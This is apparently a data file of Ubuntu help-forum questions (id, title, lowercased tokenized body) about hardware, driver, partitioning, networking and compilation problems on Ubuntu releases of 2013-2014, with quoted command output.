404466	after upgrading to ubuntu 13.04 and 13.10 tv card shows no signal any more	until ubuntu 12.10 i had my tv card working properly , but after upgrading to ubuntu 13.04 it suddenly stopped working and also in 13.10 it continues giving me `` no signal '' . a while ago someone else mentioned a similar issue here . i have checked many things to see if there 'd be a problem , but ca n't find it . maybe you see what i might do to solve it . info card : $ lspci -vv 03:05.0 multimedia controller : philips semiconductors saa7131/saa7133/saa7135 video broadcast decoder ( rev d1 ) subsystem : avermedia technologies inc dvb-t super 007 control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr+ fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b+ parerr- devsel=medium > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 64 ( 21000ns min , 8000ns max ) interrupt : pin a routed to irq 20 region 0 : memory at febff800 ( 32-bit , non-prefetchable ) [ size=2k ] capabilities : [ 40 ] power management version 2 flags : pmeclk- dsi- d1+ d2+ auxcurrent=0ma pme ( d0- , d1- , d2- , d3hot- , d3cold- ) status : d0 nosoftrst- pme-enable- dsel=0 dscale=1 pme- kernel driver in use : saa7134 the kernel driver saa7134 i had compiled some years before is still in use , so that seems ok. philips tda46h / avermedia super 007 , see linuxtv.org/wiki , uses driver saa7134 . $ lspci -vn 03:05.0 0480 : 1131:7133 ( rev d1 ) subsystem : 1461 : f01d flags : bus master , medium devsel , latency 64 , irq 20 memory at febff800 ( 32-bit , non-prefetchable ) [ size=2k ] capabilities : [ 40 ] power management version 2 kernel driver in use : saa7134 $ dmesg | grep saa713 [ 13.542954 ] saa7130/34 : v4l2 driver version 0 , 2 , 17 loaded [ 13.543058 ] saa7133 [ 0 ] : found at 0000:03:05.0 , rev : 209 , irq : 20 , latency : 64 , mmio : 0xfebff800 [ 13.543064 ] saa7133 [ 0 ] : subsystem : 1461 : f01d , board : avermedia super 007 [ card=117 , autodetected ] [ 13.543076 ] saa7133 [ 0 ] : board init : gpio is 40000 [ 13.692107 ] saa7133 [ 0 ] : i2c eeprom 00 : 61 14 1d f0 54 20 1c 00 43 43 a9 1c 55 d2 b2 92 [ 13.692115 ] saa7133 [ 0 ] : i2c eeprom 10 : ff ff ff ff ff 20 ff ff ff ff ff ff ff ff ff ff [ 13.692120 ] saa7133 [ 0 ] : i2c eeprom 20 : 01 40 01 32 32 01 01 43 88 ff 00 55 ff ff ff ff [ 13.692125 ] saa7133 [ 0 ] : i2c eeprom 30 : ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 13.692129 ] saa7133 [ 0 ] : i2c eeprom 40 : ff 21 00 c0 96 10 03 02 15 16 ff ff ff ff ff ff [ 13.692134 ] saa7133 [ 0 ] : i2c eeprom 50 : ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 13.692138 ] saa7133 [ 0 ] : i2c eeprom 60 : ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 13.692143 ] saa7133 [ 0 ] : i2c eeprom 70 : ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 13.692147 ] saa7133 [ 0 ] : i2c eeprom 80 : ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 13.692152 ] saa7133 [ 0 ] : i2c eeprom 90 : ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 13.692156 ] saa7133 [ 0 ] : i2c eeprom a0 : ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 13.692161 ] saa7133 [ 0 ] : i2c eeprom b0 : ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 13.692166 ] saa7133 [ 0 ] : i2c eeprom c0 : ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 13.692170 ] saa7133 [ 0 ] : i2c eeprom d0 : ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 13.692175 ] saa7133 [ 0 ] : i2c eeprom e0 : ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 13.692179 ] saa7133 [ 0 ] : i2c eeprom f0 : ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 17.666116 ] saa7133 [ 0 ] : registered device video1 [ v4l2 ] [ 17.666259 ] saa7133 [ 0 ] : registered device vbi0 [ 17.669460 ] saa7134 alsa driver for dma sound loaded [ 17.669485 ] saa7133 [ 0 ] /alsa : saa7133 [ 0 ] at 0xfebff800 irq 20 registered as card -2 [ 17.702063 ] dvb : registering new adapter ( saa7133 [ 0 ] ) [ 17.702072 ] saa7134 0000:03:05.0 : dvb : registering adapter 0 frontend 0 ( philips tda10046h dvb-t ) ... so the pci card is registered as video1 , dvb adapter registered , alsa driver for sound is loaded , driver saa7134 loaded . $ xawtv -hwscan /dev/video1 : ok [ -device /dev/video1 ] type : libv4l name : avermedia super 007 flags : overlay capture tuner $ dmesg | grep tuner [ 13.732173 ] tuner 0-004b : tuner -1 found with type ( s ) radio tv . [ 13.848275 ] tda829x 0-004b : setting tuner address to 60 [ 16497.243768 ] tda827xa_set_params : could not write to tuner at addr : 0xc0 etc $ scantv choosing 4 for pal and 5 for western-europe ( spain ) it starts scanning ... but it finds `` no station '' at all frequencies . ( and yes , the antenna cable is connected , and if i put another tv to that cable it does work : ) )
404467	can not connect logitech 810 keboard on 13.10	i have a logitech 810 bluetooth key board that i was able to pair when i was running ubuntu 12.04lts . after the upgrade to 13.10 it no longer works and the old recipes to get the keyboard connected no longer seem to work . has anybody succeeded in getting this keyboard to work in 13.10 ?
404468	can not use persistent mode through usb	i recent broke my hard-drive , so the only way i can use my pc is through the usb , but when i tried going into the persistent mode , all i get is a white screen . it works on live mode but not persistent mode . help , i do n't know what to do .
404469	i ca n't seem to understand how partitions work , and i do n't know how much is dedicated to each os in my computer	i recently fell in love with ubuntu , and installed it in my computer . a laptop that had a special discount because it was associated with the school or something . anyways . it came with 2 os : windows 7 and linux magic box ( translation of `` linux caixa mรกgica '' , something that was supposed to help learning but it sucks ) . i then installed ubuntu in what i thought that it was a 103gb partition , but upon further investigation i think i actually only gave it 7gb ! it was exactly the other way around i wanted . so , on the boot screen ( where i can choose the 3 different os ) it showed 2 different parts for the linux magic box : `` /dev/sda2 '' and /dev/sda5 . i tried to delete the /dev/sda 5 , but is says that it has to delete the logical ones higher than 5 ... or something along those lines . i can post the full error message if needed : ) the /dev/sda2 deleted without any problems . here is my gparted screen : as you can see , there is indeed some more space left for allocating . but there are tons of different partitions ! i wanted to delete almost all of them , but i 'm afraid i might screw up . this is what shows up in windows 7 computer ( please never mind the text being in portuguese , i think it 's understandable ) as you can see , i have 2 discs : /c/ and /d/ . so it should be 2 partitions , correct ? i really do n't understand it . my idea is to keep windows 7 installed , and ubuntu installed alongside them as well , removing only the magic box , this releasing more space for ubuntu . but what seems like a simple task actually turned not to be quite so . many thanks in advance !
404479	laptop overheating problem	i am using a vaio laptop which have radeon hd 7650m graphics card . i am new to linux and do n't understand how to solve overheating problem in my laptop . tried everything tlp , laptop-mode tools , etc .
404481	thunderbird google calendar tab acts as mobile browser	i am using thunderbird with the add-on google calendar tab to display a browser tab with google calendar . it works fine in thunderbird for windows , but in tb for ubuntu the browser tab gives me the mobile browser version of google calendar . any idea why this is or if there is a way to change the browser user agent from within tb ?
404482	is there a way to use two usb ports so that second one outputs the input from first one ?	hope question is simple enough . is there a way to use a computer like an extension cord so the input from one port outputs to other one ? sure question is simple plain but can it be done ?
404486	black screen waking from suspend	i had this same problem 6-7 months ago when i first installed ubuntu . this problem also happens if i suspend from the shutdown menu . i have searched and tried numerous `` fixes '' but none of them have worked so far . i 'm not that familiar with linux filesystem and architecture to implement some of the more advanced fixes .
404497	problem with graphics on hdmi/dvi monitor using intel hd 3000	i have a fresh install ubuntu 13.10 on my dell vostro 3750 laptop up and running fine . however , when i plug in my external monitor ( a 21 '' , 1920x1200 dell ) via hdmi-dvi* i run in to some problems . the graphics are n't running smooth . the mouse pointer lags behind , leaving an annoying trail behind it . windows flash out of existence and then re-appear when i drag them . the built-in intel hd graphics 3000 is not fancy , but it is enough to run this config smoothly on windows 7 . i have the default intel driver ( xserver-xorg etc. ) . so , what 's wrong and how do i fix it ? *yes , well , the monitor does n't have hdmi and the laptop does n't have dvi so the solution was to convert hdmi to dvi update . apparently , i have what is known as hybrid graphics , in addition to the intel integrated circuits i have a nvidia geforce gt 525m . armed with this new knowledge i installed bumblebee after having stumbled upon people describing having solved similar problems to mine with it . that backfired . with bumblebee installed and running , the external monitor was n't detected ( although , the `` ghost '' monitor , which apparently is a related problem , was also gon ) . so i uninstalled bumblebee . ubuntu now boots to nothing but a black screen and a cross-shaped mouse pointer .
404501	help in wiping off ubuntu 12.04 !	i installed ubuntu 12.04 on my laptop and my laptop is running on high temparatures ( 70-80 c ) . i tried to figure out the graphics card issues ( i have intel and amd radeon ) , i activated both and none of the are working ( the details icon does n't show any thing under graphics ) . i made a usb hd bootable with windows 8 in it and boot order and bios settings everything are normal and correct but laptop is not booting from the usb , it directly goes to ubuntu . can any one please point where the things are going wrong and any idea on how to solve them . thank you .
404502	keeping python alive through gnome 3 screen lock ?	i 've been through the ringer with this one the past few days . i wrote a script to re-target my altcoin miner every once in a while . it builds a command string from api data grabbed at coinwarz.com on an interval , it then issues the command to the system . its simple but i am having trouble keeping it alive through screen locks . i am running ubuntu gnome 13.10 with gnome 3. here is a test script which has failed the screen lock challenge : ) https : //github.com/xdaimon/xdaimonconky/blob/master/test.py i have tried different commands to start the script such as ( python test.py ) & followed by disown python test.py & followed by disown nohup python test.py & to avoid hangup signals , or try to . ( nohup python test.py ) & in a similar approach i have also tried forking my python process via python code in order to daemonize it . this gave me independence from the terminal but after a few minutes with the screen locked the script no longer executed . i previously had the function of timing the executions left in the hands of conky . this also did not work , i would wake up to 8 hours of run time on bfgminer . and i have tested that just now to confirm that the $ { execi 60 python test.py } is not continuing . i have also tried to import signals in python and capture sighups , but i lack any deep knowledge of *nix signals and how to use that module . as far as trying to debug python , i 'm not to familiar with it . it would be nice if i could just pipe whatever output the python interpreter makes to a file but i have n't spent much time on that option yet . if i run this little test script in an open terminal , or even if i daemonize the python process and kill the terminal , it still works , only when the screen locks does everything seem to go into coma . my computer is not set to hibernate or suspend , bfgminer keeps on trucking through the lock , its just my python script does n't want to comply : ) these are links to where i have posted around the web already , if you want to view them for more info . https : //teksyndicate.com/forum/code/need-help-keeping-python-script-alive/167841 does having a password protected locked screen prevent new processes from being spawned ? would bfgminer ignore sigterms while screen is locked ? i feel this is a gnome 3 related issue . although , i assume there is probably some way that this type of process should usually be handled in python that i am not aware of . anybody with superior python or unix knowledge can you help me ! ? it would be very appreciated . thanks to anybody who have already provided some feedback !
404503	missing firmware error on lubuntu 12.04 livecd : b43-phy0 error : firmware file `` b43/ucode5.fw '' not found	i 'm trying to install lubuntu 12.04 lts on my ibook g4 as the os x 10.4.11 really is n't all that great . i originally tried to use the minimal cd , but that failed as you can see by my question here : choose a mirror of the ubuntu archive on lubuntu 13.10 minimal install . i think that issue may be caused by this same issue , as there i believe there is no actual internet connection . so , i decided to try the full 12.04 cd , but i am now getting an error during the boot : ... stuff here ( logo and other boot messages - all unrelated ) *starting configure network device [ 110.081458 ] b43-phy0 error : firmware file `` b43/ucode5.fw '' not found [ 110.081669 ] b43-phy0 error : firmware file `` b43-open/ucode5.fw '' not found [ 110.081870 ] b43-phy0 error : you must go to http : //wireless.kernel.org/en/users/drivers/b43 # devicefirmware and download the correct firmware for driver version . please carefully read all instructions on the website . this is most perturbing . this post says that 10.04 works fine , but since 10.04 is eol , i do n't want to install it . this question suggests using the livecd with b43-fwcutter driver and trying to push esc during the boot to see any errors . also , would pushing shift during the boot help any ? i probably will have to blacklist the b43 driver , but i 'm not sure how . there is a bug regarding this here : https : //bugs.launchpad.net/ubuntu/+source/casper/+bug/956677 and the suggested solution is blacklisting the driver in the kernel param string , but again , i have no clue how to change the param string . i 'm going to research blacklisting a little more , but since i am using the cd , i ca n't download/install drivers , like i could on usb ( my ibook refuses to boot usb , even with open firmware hacking . ) edit : i have looked around for blacklisting this blog post : http : //clusterbleep.net/blog/2012/05/09/ubuntu-12-04-splash-screen-lockup-with-livecd/ is exactly my issue , but i never get a install/disk options screen . would holding shift during the boot allow me to get to this ? i have to hold c and then enter live to start the livecd and then i would hold shift . how do i fix this issue ? the system is a july 2005 ibook g4 1.33ghz ppc/512mb ram/40gb hdd/unsure what graphics card/and as can be seen from this issue probably a broadcom b43 internet chip thingy .
404506	120gb ssd win7 and ubuntu set up	hi i 'm new and have only been using ubuntu ( on 13.10 now ) for a few months on an old laptop i also dual booted from . it has low specs so it was mostly just to test , but i like it so far and want it to be a big part of my new pc . i 've never been able to play games before so i need windows 7 , and also for school stuff . so the goal is to dual boot win 7 and ubuntu on the new pc . i 'd like it to be : windows 7 : school/games vmw workstation ( do n't understand it 's space usage well ) microsoft outlook , office , typical stuff , maybe photoshop and games like skyrim/call of duty ubuntu : everything else i need i 'm going to be using a : kingston ssdnow v300 series 120gb ssd if ubuntu will be my main os , but win7 games are huge , how much space should i give each os ? is it bad to keep installing/deleting from my ssd if i want to switch games ? i have one 230gb ext and one 2tb ext hdd also . i 've searched google and read a lot about it on these forums , but everything says something a little different , and i 'm paranoid about not doing it the most efficient way . i need this pc to last me the next several years . thank you ! if more information is required please let me know !
404507	micro hdmi works properly 30 % of the time on 14.04	on my samsung series 9 i had ubuntu 12.04 working until an update messed everything up . i upgraded to 13 , and had more issues with audio and hdmi , so i freshly installed 14.04 . i have a hdmi cable to my 24in and half the time it works right . some times it does not show an image , other times i have gnome messaging center in middle of the screen while the screens are mirrored , but the bigger screen is extended . some times , it just works perfectly . this issue is apparent in gnome and standalone ubuntu . i was wondering if there is something i need to support hdmi better with my machine . this is driving me bonkers and makes me want to go back to windows just because the drivers are there .
404509	ubuntu desktop on a tablet	i am totally new to ubuntu so please bear with me . i 've heard that you can get `` ubuntu touch '' on tablets but i 'm not familiar with this or how to install it so i just plain ole ' do n't want it . so i 'm curious , can i install the regular ubuntu desktop on my nexus 10 tablet ? thanks for reading
404510	compiling clamav	i 'm trying to compile clamav and i have already run : ./configure make but when i run make install it returns with this error : make [ 4 ] : *** [ install-libltlibraries ] error 1 make [ 4 ] : leaving directory `/home/shocktic/downloads/clamav-0.98/libclamav' make [ 3 ] : *** [ install-am ] error 2 make [ 3 ] : leaving directory `/home/shocktic/downloads/clamav-0.98/libclamav' make [ 2 ] : *** [ install-recursive ] error 1 make [ 2 ] : leaving directory `/home/shocktic/downloads/clamav-0.98/libclamav' make [ 1 ] : *** [ install ] error 2 make [ 1 ] : leaving directory `/home/shocktic/downloads/clamav-0.98/libclamav' make : *** [ install-recursive ] error 1 will someone please let me know what i need to do or what i 'm doing wrong .
404512	my mouse has disappeared !	i upgraded to ubuntu 13.10 a couple of weeks ago . until today there has n't been any problems . after i finished a routine software update , and restarted my laptop i found that my mouse has vanished . i ca n't use it and pressing the ctrl button only shows the locator in the middle of the screen despite my having tried to move it . has any one else had this problem , if so , or if you have ideas i need help resolving this situation . hardware : -toshiba satellite a665-s5170 - microsoft wireless mobile mouse 6000 - ubuntu 13.10
404513	my webcam on google hangout is not appearing .	my webcam is working perfectly well . however on google hangout it asked me to install the plugin . i did that , but my webcam did n't turn on . can you help me out please ?
404514	ubuntu 13.10 : why is my wifi disabled everytime i reboot my system	i am facing a weird issue where my wifi is disabled on booting or rebooting and i need to run sudo modprobe brcmsmac to get it to work again . i dont have a problem with this but i am confused as to why i need to do this every time i boot in .
404515	hdmi audio not working on nvidia nforce 780a chipset	i am on ubuntu 13.10 with an amd phenom ii x4 processor and nforce 780a chipset . i do not have a video card installed . when i use the built in hdmi port , i get good video , but no audio , even after switching the output device . i tried installing the proprietary chipset drivers , switching profile in pulseaudio volume control . running pactl set-card-profile 0 output : hdmi-stereo does n't do anything either . this is the output from aplay -l : default playback/recording through the pulseaudio sound server sysdefault : card=nvidia hda nvidia , ad198x analog default audio device front : card=nvidia , dev=0 hda nvidia , ad198x analog front speakers surround40 : card=nvidia , dev=0 hda nvidia , ad198x analog 4.0 surround output to front and rear speakers surround41 : card=nvidia , dev=0 hda nvidia , ad198x analog 4.1 surround output to front , rear and subwoofer speakers surround50 : card=nvidia , dev=0 hda nvidia , ad198x analog 5.0 surround output to front , center and rear speakers surround51 : card=nvidia , dev=0 hda nvidia , ad198x analog 5.1 surround output to front , center , rear and subwoofer speakers surround71 : card=nvidia , dev=0 hda nvidia , ad198x analog 7.1 surround output to front , center , side , rear and woofer speakers iec958 : card=nvidia , dev=0 hda nvidia , ad198x digital iec958 ( s/pdif ) digital audio output hdmi : card=nvidia , dev=0 hda nvidia , hdmi 0 hdmi audio output dmix : card=nvidia , dev=0 hda nvidia , ad198x analog direct sample mixing device dmix : card=nvidia , dev=1 hda nvidia , ad198x digital direct sample mixing device dmix : card=nvidia , dev=3 hda nvidia , hdmi 0 direct sample mixing device dsnoop : card=nvidia , dev=0 hda nvidia , ad198x analog direct sample snooping device dsnoop : card=nvidia , dev=1 hda nvidia , ad198x digital direct sample snooping device dsnoop : card=nvidia , dev=3 hda nvidia , hdmi 0 direct sample snooping device hw : card=nvidia , dev=0 hda nvidia , ad198x analog direct hardware device without any conversions hw : card=nvidia , dev=1 hda nvidia , ad198x digital direct hardware device without any conversions hw : card=nvidia , dev=3 hda nvidia , hdmi 0 direct hardware device without any conversions plughw : card=nvidia , dev=0 hda nvidia , ad198x analog hardware device with all software conversions plughw : card=nvidia , dev=1 hda nvidia , ad198x digital hardware device with all software conversions plughw : card=nvidia , dev=3 hda nvidia , hdmi 0 hardware device with all software conversions i am at wits end here and feeling rather unimpressed with alsa and pulseaudio . is there anything special that needs to be done for my particular chipset ? using pavucontrol : the device under output is `` hdmi / displayport '' and is `` digital stereo ( hdmi ) output '' on the configuration tab . it should be working , but it 's not . pactl stat currently in use : 1 blocks containing 63.9 kib bytes total . allocated during whole lifetime : 131881 blocks containing 230.7 mib bytes total . sample cache size : 0 b server string : /run/user/1000/pulse/native library protocol version : 28 server protocol version : 28 is local : yes client index : 19 tile size : 65472 user name : media host name : plexbmc-serve server name : pulseaudio server version : 4.0 default sample specification : s16le 2ch 44100hz default channel map : front-left , front-right default sink : alsa_output.pci-0000_00_07.0.hdmi-stereo default source : alsa_output.pci-0000_00_07.0.hdmi-stereo.monitor cookie : 9d20:6867 pactl list sinks sink # 0 state : suspended name : alsa_output.pci-0000_00_07.0.hdmi-stereo description : built-in audio digital stereo ( hdmi ) driver : module-alsa-card.c sample specification : s16le 2ch 44100hz channel map : front-left , front-right owner module : 5 mute : no volume : 0 : 100 % 1 : 100 % 0 : -0.00 db 1 : -0.00 db balance 0.00 base volume : 100 % 0.00 db monitor source : alsa_output.pci-0000_00_07.0.hdmi-stereo.monitor latency : 0 usec , configured 0 usec flags : hardware decibel_volume latency set_formats properties : alsa.resolution_bits = `` 16 '' device.api = `` alsa '' device.class = `` sound '' alsa.class = `` generic '' alsa.subclass = `` generic-mix '' alsa.name = `` hdmi 0 '' alsa.id = `` hdmi 0 '' alsa.subdevice = `` 0 '' alsa.subdevice_name = `` subdevice # 0 '' alsa.device = `` 3 '' alsa.card = `` 0 '' alsa.card_name = `` hda nvidia '' alsa.long_card_name = `` hda nvidia at 0xfe020000 irq 20 '' alsa.driver_name = `` snd_hda_intel '' device.bus_path = `` pci-0000:00:07.0 '' sysfs.path = `` /devices/pci0000:00/0000:00:07.0/sound/card0 '' device.bus = `` pci '' device.vendor.id = `` 10de '' device.vendor.name = `` nvidia corporation '' device.product.id = `` 0774 '' device.product.name = `` mcp72xe/mcp72p/mcp78u/mcp78s high definition audio '' device.form_factor = `` internal '' device.string = `` hdmi:0 '' device.buffering.buffer_size = `` 65536 '' device.buffering.fragment_size = `` 32768 '' device.access_mode = `` mmap+timer '' device.profile.name = `` hdmi-stereo '' device.profile.description = `` digital stereo ( hdmi ) '' device.description = `` built-in audio digital stereo ( hdmi ) '' alsa.mixer_name = `` nvidia mcp77/78 hdmi '' alsa.components = `` hda:11d4198b,1043829b,00100400 hda:10de0002,10de0101,00100000 '' module-udev-detect.discovered = `` 1 '' device.icon_name = `` audio-card-pci '' ports : hdmi-output-0 : hdmi / displayport ( priority : 5900 ) active port : hdmi-output-0 formats : ac3-iec61937 , format.rate = `` [ 32000 , 44100 , 48000 , 88200 , 96000 , 176400 , 192000 ] '' eac3-iec61937 , format.rate = `` [ 32000 , 44100 , 48000 , 88200 , 96000 , 176400 , 192000 ] '' dts-iec61937 , format.rate = `` [ 32000 , 44100 , 48000 , 88200 , 96000 , 176400 , 192000 ] '' pcm
404518	ca n't hibernate ( + poor computer literacy )	when i try to hibernate my computer i receive 2 messages and computer turns off : pnp_bus_resume+0x0/0x70 returns -19 pm : device 00:08 failed to thaw error -19 can something be done ? upd : thanks to the @ minerz029 the message about free swap has disappeared . but computer still ca n't hibernate .
404521	can not access gnu grub	i accidentally changed my grub options to boot from memtest instead of the correct linux kernel . holding shift , esc , arrow keys , and every other combination will not bring up the gnu grub as desired . is there any other option besides reinstalling and starting over with a new linux version ?
404524	login to command line	it 's possible to perform a login ( with lightdm or anything else ) and enter directly in command line mode without enabling any gui for the user ?
404525	post install boot gets /dev/disk/by-uuid/ ... does no exist	i 've just installed ubuntu 12.04.3 lts on an older ( 2005 bios date ) win machine . i 've wiped out the old partitions and installed this fresh . running the `` try ubuntu '' works fine ( i 'm using it right now . ) the installation seems to go fine ( i 've done it twice now ) . but when i reboot the system to ubuntu i get an error message : '' gave up waiting for root device . ... '' eventually i get this line : '' alert ! /dev/disk/by-uuid/234 ... 89d72 does not exist . '' ( the ... is the whole uuid which i will not utter here . ) i 've installed ubuntu several times on various laptops and never had a problem . any ideas as to what this might be would be appreciated .
404526	webdav via browser - url /webdav was not found on this server	webdav installation auf dem server erfolgte entsprechend : http : //mein.homelinux.com/wiki/dienste/webdav leider bekomme ich folgende browser-meldung via : http : //a.b.c.d/webdav the requested url /webdav was not found on this server . apache/2.4.6 ( ubuntu ) server at a.b.c.d port 80 überprüfung der konfiguration ergab keine fehler user @ ubuntusrv : /etc/apache2/sites-enabled $ ls -all insgesamt 8 drwxr-xr-x 2 root root 4096 jan 8 16:39 . drwxr-xr-x 9 root root 4096 jan 8 16:02 .. lrwxrwxrwx 1 root root 35 jan 1 2009 000-default.conf - > ../sites-available/000-default.conf lrwxrwxrwx 1 root root 31 jan 8 15:55 default.conf - > ../sites-available/default.conf lrwxrwxrwx 1 root root 35 jan 8 16:39 default-ssl.conf - > ../sites-available/default-ssl.conf wobei default anzeigt alias /webdav `` /var/webdav/ '' < directory `` /var/webdav/ '' > dav on options +indexes authtype basic authname dav authuserfile /etc/apache2/passwords require valid-user < /directory > auch der user und das passwort wurden richtig angelegt . sudo view /etc/apache2/passwords beinhaltet : www-data : $ apr1 $ b2tntros $ 2wereqllbtbbcheevn/dy/ auch den apache-server habe ich bereits x-mal neu gestartet . zum login komme ich aber nie . hat jemand einen vorschlag ?
404536	where are the compiled sdl libraries ?	i compiled the sdl 2 libraries as described here what is the general procedure to install development libraries in ubuntu ? what i would like to know , is where are these libraries actually located after compiling/installation ?
404537	why does `` echo ehc1 > /proc/acpi/wakeup '' change enabled to disabled	i have a very basic question . i understand what echo does , and how it directs a string to the file /proc/acpi/wakeup . my question is what is actually happening when i direct the word ehc1 to /proc/acpi/wakeup . why does it change the line under status from *enabled to *disabled or vice versa ? thank you ! why does n't it just append the word ehc1 to the end ?
404539	wireless adapter connects every time i insert it , but stops working after a short while	the model is edimax ew-7811un 150mbps wireless nano usb adapter . it does n't work for more than a few minutes , but if i take it out and let it cool then insert it again , it works .
404540	gnome-session-fallback and gnome-shell installation sucessful but can not run	i have installed gnome-session-fallback and gnome-shell successfully but when i log out , a session selector of some kind appears and when i try to run it in a unix/posix terminal , it comes out with a error like this : [ warning ] failed to acquire org.gnome.sessionmanager can anyone try to help me out on this one .
404541	nic bonding mode 6 ( balance-alb ) only uses one nic	os : ubuntu 12.04lts bonding is in /etc/modules for automatic loading at boot the bonding configuration works in bond-mode 0 but not bond-mode 6 -- when the system boots bond0 comes up with only eth0 as slave eth1 is not up at all in ifconfig but can be brought up ifconfig eth1 up however , even after it is brought up , it is not enslaved to bond0 attempting to use ifenslave bond0 eth1 results in master 'bond0 ' , slave 'eth1 ' : error : enslave failed syslog reports that bonding : bond0 : error : dev_set_mac_address of dev eth1 failed ! however , i am able to use ifconfig eth1 hw ether 123456789abc to set the mac address on the adapter ( works on both eth0 and eth1 ) bond0 link encap : ethernet hwaddr < mac address > inet addr:10.3.0.1 bcast:10.255.255.255 mask:255.0.0.0 inet6 addr : fe80 : :222:68ff : fe39:83c0/64 scope : link up broadcast master multicast mtu:1500 metric:1 rx packets:10519 errors:0 dropped:0 overruns:0 frame:0 tx packets:9444 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:2179485 ( 2.1 mb ) tx bytes:1158406 ( 1.1 mb ) eth0 link encap : ethernet hwaddr 34:56:78:9a : bc : de < -- set using ifconfig up broadcast slave multicast mtu:1500 metric:1 rx packets:10519 errors:0 dropped:0 overruns:0 frame:0 tx packets:9444 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:2179485 ( 2.1 mb ) tx bytes:1158406 ( 1.1 mb ) interrupt:17 eth1 link encap : ethernet hwaddr 12:34:56:78:9a : bc < -- set using ifconfig inet6 addr : fe80 : :1034:56ff : fe78:9abc/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:3417 errors:0 dropped:0 overruns:1 frame:0 tx packets:63 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:689886 ( 689.8 kb ) tx bytes:28363 ( 28.3 kb ) interrupt:20 base address:0xe800 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:306 errors:0 dropped:0 overruns:0 frame:0 tx packets:306 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:76193 ( 76.1 kb ) tx bytes:76193 ( 76.1 kb ) lo:1 link encap : local loopback inet addr:172.16.1.1 mask:255.255.255.0 up loopback running mtu:16436 metric:1 here is my /etc/network/interfaces : auto lo lo:1 br0 iface lo inet loopback auto he-ipv6 iface he-ipv6 inet6 v4tunnel endpoint 209.51.161.14 address 2001:470:1f06:4ca : :2 gateway 2001:470:1f06:4ca : :1 netmask 64 local 10.3.0.1 up ip -6 route add default dev he-ipv6 down ip -6 route del default dev he-ipv6 iface lo:1 inet static address 172.16.1.1 netmask 255.255.255.0 network 172.16.1.0 auto eth0 iface eth0 inet manual bond-master bond0 auto eth1 iface eth1 inet manual bond-master bond0 auto bond0 iface bond0 inet static address 10.3.0.1 netmask 255.0.0.0 gateway 10.0.0.1 bond-mode 6 bond-miimon 100 bond-lacp-rate 1 bond-slaves none ethtool ethx output : settings for eth0 : supported ports : [ tp ] supported link modes : 10baset/half 10baset/full 100baset/half 100baset/full 1000baset/half 1000baset/full supported pause frame use : no supports auto-negotiation : yes advertised link modes : 10baset/half 10baset/full 100baset/half 100baset/full 1000baset/half 1000baset/full advertised pause frame use : no advertised auto-negotiation : no speed : 100mb/s duplex : full port : twisted pair phyad : 0 transceiver : internal auto-negotiation : on mdi-x : unknown supports wake-on : pg wake-on : g current message level : 0x000000ff ( 255 ) drv probe link timer ifdown ifup rx_err tx_err link detected : yes settings for eth1 : supported ports : [ tp mii ] supported link modes : 10baset/half 10baset/full 100baset/half 100baset/full supported pause frame use : no supports auto-negotiation : yes advertised link modes : 10baset/half 10baset/full 100baset/half 100baset/full advertised pause frame use : no advertised auto-negotiation : yes link partner advertised link modes : 10baset/half 10baset/full 100baset/half 100baset/full link partner advertised pause frame use : symmetric link partner advertised auto-negotiation : yes speed : 100mb/s duplex : full port : mii phyad : 24 transceiver : internal auto-negotiation : on supports wake-on : g wake-on : d current message level : 0x00000001 ( 1 ) drv link detected : yes
404543	install octave 3.8.0 in ubuntu 12.04	with the following commands wget ftp : //ftp.gnu.org/gnu/octave/octave-3.8.0.tar.bz2 tar -xvf octave-3.8.0.tar.bz2 cd octave-3.8.0 sudo apt-get build-dep octave ./configure make sudo make install i have errors in the make and make install phases and octave does not install . do you have any suggestion ? thanks for any help here are the error messages at the end of the make and make install commands : /usr/local/include/llvm/passmanager.h:34:15 : error : 'passmanager ' is already declared in this scope /usr/local/include/llvm/passmanager.h:35:15 : error : 'functionpassmanager ' is already declared in this scope corefcn/pt-jit.cc : in member function 'bool tree_jit : :initialize ( ) ' : corefcn/pt-jit.cc:1891:48 : error : can not convert 'llvm : :legacy : :passmanager* ' to 'llvm : :passmanager* ' in assignment corefcn/pt-jit.cc:1892:22 : error : invalid use of incomplete type 'struct llvm : :passmanager' corefcn/jit-util.h:46:9 : error : forward declaration of 'struct llvm : :passmanager' corefcn/pt-jit.cc:1894:55 : error : can not convert 'llvm : :legacy : :functionpassmanager* ' to 'llvm : :functionpassmanager* ' in assignment corefcn/pt-jit.cc:1896:15 : error : invalid use of incomplete type 'struct llvm : :functionpassmanager' corefcn/jit-util.h:45:9 : error : forward declaration of 'struct llvm : :functionpassmanager' corefcn/pt-jit.cc:1900:15 : error : invalid use of incomplete type 'struct llvm : :functionpassmanager' corefcn/jit-util.h:45:9 : error : forward declaration of 'struct llvm : :functionpassmanager' corefcn/pt-jit.cc:1901:15 : error : invalid use of incomplete type 'struct llvm : :functionpassmanager' corefcn/jit-util.h:45:9 : error : forward declaration of 'struct llvm : :functionpassmanager' corefcn/pt-jit.cc:1902:15 : error : invalid use of incomplete type 'struct llvm : :functionpassmanager' corefcn/jit-util.h:45:9 : error : forward declaration of 'struct llvm : :functionpassmanager' 